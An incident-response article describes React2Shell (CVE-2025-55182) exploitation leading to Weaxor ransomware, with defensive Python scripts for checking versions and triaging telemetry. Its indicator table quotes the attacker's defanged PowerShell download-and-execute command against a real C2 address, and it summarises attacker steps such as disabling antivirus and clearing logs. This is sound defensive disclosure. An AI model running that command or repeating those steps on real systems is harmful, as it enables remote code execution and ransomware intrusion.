S-RM has responded to an incident where a threat actor used the recently disclosed critical vulnerability known as React2Shell (CVE-2025-55182) to gain access to a corporate network and deploy ransomware. The deployment of ransomware in S-RM’s cases appears to have been automated, and the scope of compromise remained limited to the server which was vulnerable to React2Shell.
This is the first time S-RM has observed this vulnerability being used by financially motivated threat actors to facilitate a cyber extortion attack, and highlights an escalation in the known impact of this vulnerability compared to other public reporting, which has so far primarily documented instances of the vulnerability being used to introduce backdoor malware or crypto miners.
This article describes how the threat actor rapidly went from initial access to ransomware deployment and shares technical guidance on what you can do to stay protected.
What is React2Shell?
React2Shell (CVE-2025-55182) is a maximum severity vulnerability in React Server Components (RSC) which was publicly disclosed on 3 December 2025. The vulnerability impacts the Flight Protocol, a core feature of the React web development library and the open-source framework Next.js, which is used to speed up web application rendering. The vulnerability allows an attacker to send a malicious HTTP request to trick the web server into running malicious code. Code is executed with the privileges of the user running the web server process, which could give a remote attacker highly privileged access to unpatched systems.
The vulnerability received a critical CVSS rating of 10.0 due to the ease of exploitation and the fact that many exposed systems are potentially at risk. The lack of authentication means it is also highly susceptible to automated attacks.
Which threat actors are exploiting React2Shell?
Initial reporting from AWS on 4 December indicated that nation-state actors were very quick to begin attempting to exploit the vulnerability, with malicious scanning activity beginning within hours of public disclosure. As the aim of these threat actors was likely espionage, observed post-compromise activity was limited to the installation of persistent backdoors into networks. Financially motivated threat actors were also quick to begin exploiting the vulnerability for illicit cryptocurrency mining. In both cases, the threat actors aimed to evade detection and maintain persistent access to compromised systems.
S-RM has now observed one financially motivated threat actor use React2Shell as the initial access vector in a ransomware attack. This marks a shift from previously reported exploitation. It indicates threat actors whose modus operandi involves cyber extortion are also successfully exploiting this vulnerability, albeit on a much smaller scale and likely in an automated fashion.
What is Weaxor ransomware?
The specific ransomware payload we observed was a strain called Weaxor, which was first detected in late 2024. Weaxor is reported to be a rebrand of the Mallox ransomware strain. Mallox was active from 2021 and was associated with exploiting insecure Microsoft SQL servers.
Weaxor is not associated with a public ransomware-as-a-service (‘RaaS’) operation or dark web data leak site. Its predecessor Mallox did operate a RaaS platform, but there is no definitive information about Weaxor having its own affiliate recruitment programme separate from the Mallox ecosystem. Public reporting also indicates that ransom demands are relatively low. This suggests Weaxor may be used by less sophisticated actors focused on targeting public-facing web servers.
React2Shell to Weaxor Attack Chain
Immediately after the threat actor gained access to our client’s network on 5 December 2025, they ran an obfuscated PowerShell command, which established command and control (C2) by downloading a Cobalt Strike PowerShell stager and installing a beacon that called back to their remote infrastructure. After this, the threat actor disabled real-time protection in Windows Defender Antivirus to prepare the environment for secondary payloads.
The ransomware binary was dropped and executed on the system less than one minute after initial access. Recovery notes titled "RECOVERY INFORMATION.txt" were created in multiple directories. Encrypted files were given the file extension “.weax”. After ransomware detonation, a text file was also created on disk which included the public IP address of the target. This was likely sent back to the threat actor’s C2 server. As a defence evasion tactic, event logs were cleared and volume shadow copies were deleted.
We did not observe any evidence of attempted lateral movement to other systems beyond the vulnerable web server, and there was no evidence that data exfiltration was attempted. The short interval between initial access and ransomware deployment suggests that this was part of an automated campaign, although we did not observe any artefacts in the compromised environment which explicitly confirm this.
We also identified evidence that the same host was subsequently compromised by separate threat actors who deployed alternate C2 mechanisms over the course of the following day, before the server was taken offline and response activities commenced.
Lessons Learned
Ransomware deployment occurred just two days after the public disclosure of the React2Shell vulnerability. This highlights how quickly financially motivated threat actors now move to automate campaigns against critical vulnerabilities.
However, we have not yet seen evidence of more advanced actors in the ransomware ecosystem using this vulnerability to establish a foothold and then gain deeper access into victims’ networks.
Organisations running React Server Components should verify that they are running a fully patched version. On 11 December React warned that the initially released patches (19.0.2, 19.1.3 and 19.2.2) were still vulnerable, and advised all organisations running applications with React code on a server, or running a bundler or framework that supports React Server Components, to patch immediately.
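The first step in that verification is knowing which deployed applications carry React Server Components code and at what version. The script below is an added example (not from the article or from the React project) that walks a package-lock.json, including nested node_modules copies, and flags the React 19 patch levels the article says React called still vulnerable on 11 December, together with anything older in the same minor lines. The article does not state the final fixed versions, so anything newer, and non-React packages such as next, are reported for confirmation against the current React advisory rather than marked safe. The package list, the constructed lockfile and the lockfileVersion 2/3 layout are assumptions.

```python
"""Inventory React Server Components packages in a package-lock.json.

Added example, not from the article or the React project. Assumes a
lockfileVersion 2 or 3 file (the "packages" map keyed by node_modules path).
"""
import json
from typing import Dict, List, Tuple

# Assumption: packages whose presence indicates RSC / Flight code is shipped.
RSC_PACKAGES = {"react", "react-dom", "react-server-dom-webpack",
                "react-server-dom-turbopack", "react-server-dom-parcel", "next"}
# Highest patch level per React 19 minor line that the article reports React
# described as still vulnerable on 11 December.
STILL_VULNERABLE_UPTO = {(19, 0): 2, (19, 1): 3, (19, 2): 2}


def parse_version(version: str) -> Tuple[int, int, int]:
    """Parse 'MAJOR.MINOR.PATCH'; pre-release and build suffixes are dropped."""
    core = version.split("-", 1)[0].split("+", 1)[0]
    parts = [int(p) for p in core.split(".")[:3]]
    while len(parts) < 3:
        parts.append(0)
    return parts[0], parts[1], parts[2]


def classify(name: str, version: str) -> str:
    """VULNERABLE if at or below a version React said was still vulnerable, else VERIFY."""
    major, minor, patch = parse_version(version)
    if name.startswith("react") and major == 19:
        limit = STILL_VULNERABLE_UPTO.get((major, minor))
        if limit is not None and patch <= limit:
            return "VULNERABLE"
    # Newer React releases, other React majors and framework packages (next)
    # are not covered by the article's version list: confirm against the advisory.
    return "VERIFY"


def inventory(lock: Dict) -> List[Dict]:
    """Return every RSC-related package instance in the lockfile with its status."""
    results = []
    for path, meta in lock.get("packages", {}).items():
        if not path:  # "" is the root project entry, not a dependency
            continue
        name = path.rsplit("node_modules/", 1)[-1]  # keeps scoped names intact
        if name in RSC_PACKAGES and "version" in meta:
            results.append({"path": path, "name": name, "version": meta["version"],
                            "status": classify(name, meta["version"])})
    return results


def inventory_file(path: str) -> List[Dict]:
    """Convenience wrapper for a lockfile on disk."""
    with open(path, encoding="utf-8") as fh:
        return inventory(json.load(fh))


# Constructed sample lockfile; the versions are illustrative, not from any real app.
SAMPLE_LOCK = {
    "name": "example-app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "example-app", "version": "1.0.0"},
        "node_modules/next": {"version": "15.5.0"},
        "node_modules/react": {"version": "19.1.3"},
        "node_modules/react-dom": {"version": "19.1.3"},
        "node_modules/react-server-dom-webpack": {"version": "19.1.3"},
        "node_modules/legacy-widget/node_modules/react": {"version": "18.3.1"},
        "node_modules/lodash": {"version": "4.17.21"},
    },
}

if __name__ == "__main__":
    for row in inventory(SAMPLE_LOCK):
        print(f"{row['status']:10} {row['name']:28} {row['version']:10} {row['path']}")
```

Run it against each server-side application's lockfile; nested copies matter because a framework can bundle its own React, so a patched top-level react does not on its own prove the server code path is fixed.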
Patching alone is not sufficient. Organisations should conduct a forensic review of any previously vulnerable internet-facing web servers to confirm whether they were compromised. This should involve checking for:
- Evidence of unusual outbound connections potentially indicative of C2
- Evidence of AV/endpoint protection disabling
- Evidence of log clearing/tampering
- Evidence of unusual spikes in resource usage indicative of crypto miners
- Our indicators of compromise (IOCs) set out below, and other public IOCs related to React2Shell exploitation
Detections and evidence of exploitation of React2Shell
In subsequent activity on the compromised web server after the ransomware deployment, we observed ‘cmd.exe’ and ‘powershell.exe’ processes being spawned from ‘node.exe’, the legitimate executable for Node.js. This was also followed by the ‘whoami’ command being run for discovery. This is a strong indicator of compromise for React2Shell exploitation. Defenders should review Windows event logs or EDR telemetry for any evidence of process creation from binaries related to Node or React. It is likely that earlier discovery activity around the time of initial access was obscured due to event log clearing associated with the ransomware deployment.
In the initial intrusion, there was limited direct evidence of exploitation of CVE-2025-55182, likely due to log clearing associated with the ransomware deployment. However, at around the time of initial access, the User Access Logs on the compromised web server recorded a ‘File Server’ connection from the local host (127.0.0.1), associated with the user account which ran the vulnerable process. Anomalous activity in this artefact is often a strong contextual indication of exploitation of a software vulnerability.
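The forensic review checklist above and the process-creation indicator described in this section can be turned into a single triage pass over exported telemetry. The script below is an added example, not the article's or S-RM's own tooling: it runs over constructed records shaped like the fields a SIEM or EDR exports for process-creation, event-log and network-connection events, and flags shells spawned from node.exe, whoami discovery, cleared event logs (Security 1102 and System 104), Windows Defender real-time protection being disabled (Defender/Operational event 5001) and connections to the IP addresses in the article's IOC table. The record schema, the sample events and their timestamps are assumptions; Windows hosting of the Node.js process is also assumed.

```python
"""Triage constructed Windows telemetry for the React2Shell / Weaxor indicators.

Added example; the record layout and sample events are constructed, not real data.
"""
from collections import Counter
from typing import Dict, Iterable, List

# Network IOCs from the article's table, undefanged so they can be matched.
IOC_IPS = {
    "23.235.188.3", "193.143.1.153", "45.221.113.96", "45.221.114.250",
    "43.156.70.172", "45.194.22.139", "38.47.103.117",
}
# node.exe hosts React Server Components on Windows; a shell spawned from it is
# the strong indicator the article describes.
RSC_HOST_PROCESSES = {"node.exe"}
SHELL_PROCESSES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DISCOVERY_PROCESSES = {"whoami.exe"}
# Event IDs for the checklist items: Security 1102 and System 104 record a
# cleared event log; Defender/Operational 5001 records real-time protection disabled.
LOG_CLEARED_EVENTS = {("Security", 1102), ("System", 104)}
DEFENDER_RTP_DISABLED = ("Microsoft-Windows-Windows Defender/Operational", 5001)


def basename(image_path: str) -> str:
    """Return the lower-cased file name of a Windows image path."""
    return image_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events: Iterable[Dict]) -> List[Dict]:
    """Return one finding per event that matches an indicator, oldest first."""
    findings: List[Dict] = []
    for ev in events:
        kind = ev.get("type")
        if kind == "process":
            parent = basename(ev.get("parent_image", ""))
            child = basename(ev.get("image", ""))
            if parent in RSC_HOST_PROCESSES and child in SHELL_PROCESSES:
                findings.append({"time": ev["time"], "category": "shell_from_rsc_host",
                                 "detail": f"{parent} spawned {child}: {ev.get('command_line', '')}"})
            elif child in DISCOVERY_PROCESSES:
                findings.append({"time": ev["time"], "category": "discovery",
                                 "detail": f"{child} run by {parent}"})
        elif kind == "eventlog":
            key = (ev["channel"], ev["event_id"])
            if key in LOG_CLEARED_EVENTS:
                findings.append({"time": ev["time"], "category": "log_cleared",
                                 "detail": f"{ev['channel']} log cleared (event {ev['event_id']})"})
            elif key == DEFENDER_RTP_DISABLED:
                findings.append({"time": ev["time"], "category": "av_disabled",
                                 "detail": "Defender real-time protection disabled (event 5001)"})
        elif kind == "network":
            if ev["dst_ip"] in IOC_IPS:
                findings.append({"time": ev["time"], "category": "ioc_connection",
                                 "detail": f"{basename(ev.get('image', ''))} -> {ev['dst_ip']}:{ev['dst_port']}"})
    return sorted(findings, key=lambda f: f["time"])


def summarise(findings: List[Dict]) -> Dict[str, int]:
    """Count findings per category for a quick host-level verdict."""
    return dict(Counter(f["category"] for f in findings))


# Constructed sample telemetry: times and paths are illustrative only.
SAMPLE_EVENTS = [
    {"type": "process", "time": "2025-12-05T10:00:01Z", "parent_image": r"C:\app\node.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c whoami"},
    {"type": "process", "time": "2025-12-05T10:00:02Z", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\whoami.exe", "command_line": "whoami"},
    {"type": "process", "time": "2025-12-05T09:30:00Z", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "command_line": "powershell.exe"},
    {"type": "eventlog", "time": "2025-12-05T10:00:10Z",
     "channel": "Microsoft-Windows-Windows Defender/Operational", "event_id": 5001},
    {"type": "eventlog", "time": "2025-12-05T10:00:40Z", "channel": "Security", "event_id": 1102},
    {"type": "eventlog", "time": "2025-12-05T09:45:00Z", "channel": "Security", "event_id": 4624},
    {"type": "network", "time": "2025-12-05T10:00:05Z",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dst_ip": "23.235.188.3", "dst_port": 443},
    {"type": "network", "time": "2025-12-05T10:00:06Z", "image": r"C:\app\node.exe",
     "dst_ip": "8.8.8.8", "dst_port": 53},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["time"], finding["category"], finding["detail"])
    print(summarise(triage(SAMPLE_EVENTS)))
```

The interactive PowerShell launched from explorer.exe and the DNS lookup are deliberately left unflagged: the rule keys on the parent being the RSC host process, which is what separates exploitation from routine administration. Because the article notes that log clearing removed much of the evidence around initial access, this pass is most useful on telemetry that was forwarded off the host (EDR or a SIEM) before the ransomware ran.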
Indicators of Compromise
S-RM's team identified the following IOCs during the investigation:
Host-based IOCs
| Indicator name | Description | SHA1 |
|---|---|---|
| weax.txt | File containing system information including the public IP address of the target | N/A |
| IEX (New-Object System[.]Net[.]Webclient).DownloadString('http[://]23[.]235[.]188[.]3:[REDACTED]') | Deobfuscated PowerShell command to download malicious payloads (unique reference redacted) | N/A |
| ZQyfcAJ.exe | Weaxor ransomware binary | f6083acf5fde12d17fb5b3098242e92a48cbf122 |
| Agtisx.exe | Command and control (C2) payload, likely from a separate intrusion | 05f4407eb2e413c3babdc3054e6db032cadc51b2 |
Network-based IOCs
| IP address/domain | Description |
|---|---|
| 23.235.188[.]3 | C2 IP address used in Weaxor attack |
| 193.143.1[.]153 | IP address the Weaxor ransomware connected to over port 80 |
| 45.221.113[.]96 | C2 IP address associated with Agtisx.exe |
| 45.221.114[.]250 | C2 IP address associated with Agtisx.exe |
| 43.156.70[.]172 | C2 IP address associated with Agtisx.exe |
| 45.194.22[.]139 | C2 IP address associated with Agtisx.exe |
| 38.47.103[.]117 | C2 IP address associated with Agtisx.exe |
Please contact S-RM if you are concerned about your organisation’s exposure to this vulnerability.